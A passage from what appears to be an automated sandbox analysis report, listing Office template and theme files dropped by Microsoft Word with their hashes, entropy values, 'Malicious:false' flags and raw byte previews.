                                                                                                                            SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                            MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                            SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                            SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                            SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):374
                                                                                                                            Entropy (8bit):3.5414485333689694
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                            MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                            SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                            SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                            SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):47296
                                                                                                                            Entropy (8bit):6.42327948041841
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                            MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                            SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                            SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                            SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):238
                                                                                                                            Entropy (8bit):3.472155835869843
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                            MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                            SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                            SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                            SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):5151
                                                                                                                            Entropy (8bit):7.859615916913808
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                            MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                            SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                            SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                            SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):274
                                                                                                                            Entropy (8bit):3.438490642908344
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                            MD5:0F98498818DC28E82597356E2650773C
                                                                                                                            SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                            SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                            SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                            Malicious:false
                                                                                                                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Word 2007+
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):34415
                                                                                                                            Entropy (8bit):7.352974342178997
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                            MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                            SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                            SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                            SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):562113
                                                                                                                            Entropy (8bit):7.67409707491542
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                            MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                            SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                            SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                            SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):278
                                                                                                                            Entropy (8bit):3.535736910133401
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                            MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                            SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                            SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                            SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):486596
                                                                                                                            Entropy (8bit):7.668294441507828
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                            MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                            SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                            SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                            SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):274
                                                                                                                            Entropy (8bit):3.535303979138867
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                            MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                            SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                            SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                            SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):608122
                                                                                                                            Entropy (8bit):7.729143855239127
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                            MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                            SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                            SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                            SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):278
                                                                                                                            Entropy (8bit):3.516359852766808
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                            MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                            SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                            SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                            SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):523048
                                                                                                                            Entropy (8bit):7.715248170753013
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                            MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                            SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                            SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                            SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):3.5159096381406645
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                            MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                            SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                            SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                            SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):777647
                                                                                                                            Entropy (8bit):7.689662652914981
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                            MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                            SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                            SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                            SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):290
                                                                                                                            Entropy (8bit):3.5091498509646044
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                            MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                            SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                            SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                            SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                            Malicious:false
